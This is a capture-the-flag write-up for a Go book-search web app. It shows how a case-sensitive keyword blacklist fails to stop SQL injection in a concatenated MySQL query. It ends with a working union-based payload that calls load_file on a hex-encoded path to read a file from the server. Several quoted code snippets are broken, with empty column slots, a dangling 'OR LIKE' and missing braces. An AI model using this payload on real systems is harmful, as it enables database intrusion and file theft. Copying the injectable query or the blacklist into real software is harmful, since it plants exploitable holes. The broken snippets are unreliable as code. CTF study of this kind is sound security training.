Books Gallery

Challenge Description

Author : anakmamah

Lately, Pak Vincent has enjoyed reading books, but when he tried to search for a specific book, he realized that a feature was missing. He wondered why it had disappeared, especially since he was about to use it to find the book he wanted to read.




We are given a full source-code of a website written in Go. Looking at the docker-compose.yml file, we can see that the flag is stored on the database container meaning that we could use an SQL injection to solve this challenge. And also, the database for this challenge is using MySQL, so that could be important later on.

# snip
    image: mysql:8.0
    container_name: books-galery-db
    restart: always
      - MYSQL_ROOT_PASSWORD=password
      - MYSQL_USER=user
      - MYSQL_PASSWORD=password
      - MYSQL_DATABASE=books_galery
      - "3306:3306"
      - ./flag.txt:/var/lib/mysql-files/flag.txt
      - ./database/database.sql:/docker-entrypoint-initdb.d/database.sql
# snip

From the ShowBooks controller, we can see that the parameters are concatenated to the query meaning that we could inject SQL statements to it. But, there is a SanitizeData function that implement some sort of blacklisting.

// snip
func ShowBooks(db *sql.DB) gin.HandlerFunc {
		searchQuery := c.Query("query")
		searchQuery = lib.SanitizeData(searchQuery)
		log.Printf("Search query: %s", searchQuery)
		var rows *sql.Rows
		var err error
		if searchQuery != "" {
			query := `
				SELECT b.book_id, b.title,, b.img_path 
				FROM books b 
				JOIN genres g ON b.genre_id = g.genre_id 
				WHERE b.title LIKE '%` + searchQuery + `%' OR LIKE '%` + searchQuery + `%'`
			rows, err = db.Query(query)
		} else {
			query := `SELECT b.book_id, b.title,, b.img_path 
			          FROM books b 
			          JOIN genres g ON b.genre_id = g.genre_id`
			rows, err = db.Query(query)
// snip
func SanitizeData(input string) string {
	replacements := []struct {
		old string
		new string
		{"..", "x"},
		{"--", "x"},
		{"/*", "x"},
		{"HAVING", "x"},
		{"UNION", "x"},
		{"SUBSTRING", "x"},
		{"ASCII", "x"},
		{"SHA1", "x"},
		{"ROW_COUNT", "x"},
		{"SELECT", "x"},
		{"INSERT", "x"},
		{"CASE WHEN", "x"},
		{"FILE", "x"},
		{"DROP", "x"},
		{"RLIKE", "x"},
		{" IF ", "x"},
		{" OR ", "x"},
		{"CONCAT", "x"},
		{"WHERE", "x"},
		{"UPDATE", "x"},
		{"or 1", "x"},
		{"or 1=1", "x"},
		{"flag", "x"},
		{"txt", "x"},
		{"or true", "x"},
		{"=", ""},
		{"+", "-"},
		{"\\", "x"},
		{"=$", "+$"},
		{"+$", "=$"},

	input = strings.TrimSpace(input)

	for _, r := range replacements {
		input = strings.ReplaceAll(input, r.old,

	return input

One problem with the sanitization is that the replacement does not account for capitalization. Since SQL does not check for capitalization, the statement blacklists are useless. But, we still cannot use flag or txt as our input. Therefore, we can use encoding to bypass this blacklist.


The payload is a basic union-based SQL injection but we will open the flag.txt file and output it on one of the rows.

' union select 1,load_file(unhex('2f7661722f6c69622f6d7973716c2d66696c65732f666c61672e747874')),1,1 from users %23

Then we just use that as our query and the flag will be printed out!

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